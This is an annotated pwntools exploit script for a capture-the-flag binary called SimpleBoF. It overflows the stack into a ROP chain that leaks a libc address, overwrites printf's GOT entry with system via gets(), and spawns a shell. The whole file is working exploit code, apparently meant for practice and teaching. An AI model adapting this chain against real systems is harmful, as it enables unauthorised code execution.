from pwn import *
# Exploit script for the CTF binary SimpleBoF (pwntools, Python 2 -- note the
# print statements and str payloads). The chain below is a stack overflow into
# a ROP chain that leaks a libc pointer, overwrites a GOT slot via gets(), and
# calls through the overwritten slot. As written it depends on the target
# having no stack canary, a non-PIE image (fixed 0x400xxx/0x601xxx addresses)
# and a writable GOT (no Full RELRO); each of those mitigations on its own
# would break this chain.
e = ELF('./SimpleBoF')
s = process(e.path)
#s = remote('localhost', 6969)
#s = gdb.debug(e.path)
# Hard-coded addresses for this particular build. The gadget/PLT/GOT values
# belong to the binary; the *_offset values are symbol offsets inside one
# specific libc build -- verify both against the binary and the libc in use
# before reuse, a mismatch here is the usual reason the run fails.
poprdi = 0x400623            # named as a "pop rdi ; ret" gadget
formatstring = 0x400650      # format string inside the binary; contents not shown here
poprsi_popr15 = 0x400621     # named as a "pop rsi ; pop r15 ; ret" gadget
writeable_addr = 0x601040    # scratch location in a writable section (used in step 3)
printf_got = 0x601018        # printf's GOT slot -- only writable without Full RELRO
printf_plt = 0x400450
gets_plt = 0x400480
system_offset = 0x3f450      # libc offsets (libc-build specific)
printf_offset = 0x4f160
gets_offset = 0x68630
binsh_offset = 0x1619f9
# step 1: leaking printf address
# 0x28 bytes of filler reach the saved return address; everything after it is
# the ROP chain, executed one gadget per `ret`.
buff = 0x28
payload = 'A' * buff
# rsi (2nd argument) = printf@got, r15 = don't-care filler
payload += p64(poprsi_popr15)
payload += p64(printf_got)
payload += p64(0xdeadbeef)
# rdi (1st argument) = format string, then call printf@plt to print the
# resolved libc address stored in the GOT slot
payload += p64(poprdi)
payload += p64(formatstring)
payload += p64(printf_plt)
# step 2: overwrite printf GOT with system using gets@plt: rdi -> printf@got
# gets() writes whatever "stage 2" sends (further down) straight into the GOT slot.
payload += p64(poprdi)
payload += p64(printf_got)
payload += p64(gets_plt)
# step 3: read "/bin/sh" to writeable address
# second gets() call; its input is the "stage 3" sendline further down.
payload += p64(poprdi)
payload += p64(writeable_addr)
payload += p64(gets_plt)
# step 4: rdi -> writeable and call printf@plt
# printf@plt now jumps through the slot rewritten in step 2, i.e. to system.
payload += p64(poprdi)
payload += p64(writeable_addr)
payload += p64(printf_plt)
print "stage 1: leaking printf address"
s.sendline(payload)
print "payload sent"
#gdb.attach(s)
# Take the last 6 bytes of whatever came back and zero-extend to 8 for u64.
# NOTE(review): assumes the leaked pointer is the tail of the output with no
# trailing noise, and that recv() returned the whole response in one call --
# confirm against the binary's actual output.
addr = s.recv().strip()[-6:] + '\x00\x00'
printf_addr = u64(addr)
print "printf is @ " + str(hex(printf_addr))
# libc base from the leak; remaining addresses are base + per-build offset
libc_base_addr = printf_addr - printf_offset
print "libc base address: " + str(hex(libc_base_addr))
system_addr = libc_base_addr + system_offset
print "system is @ " + str(hex(system_addr))
# binsh_addr and gets_addr are computed and printed but never used below:
# "/bin/sh" is supplied by stage 3 instead of taken from libc.
binsh_addr = libc_base_addr + binsh_offset
print "//bin//sh is @ " + str(hex(binsh_addr))
gets_addr = libc_base_addr + gets_offset
print "gets is @ " + str(hex(gets_addr))
print "stage 2: sending system address"
# consumed by the first gets() in the chain (step 2) -> lands in printf@got
s.sendline(p64(system_addr))
print "stage 3: sending /bin/sh to writeable address"
# consumed by the second gets() in the chain (step 3); step 4 then runs
s.sendline("/bin/sh")
s.interactive()
s.close()